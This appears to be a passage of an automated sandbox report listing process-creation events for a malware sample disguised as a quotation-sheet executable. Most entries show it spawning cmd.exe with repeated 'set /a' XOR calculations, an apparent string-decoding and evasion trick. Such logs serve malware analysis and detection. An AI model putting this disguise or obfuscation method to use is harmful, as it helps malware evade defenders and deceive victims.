            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
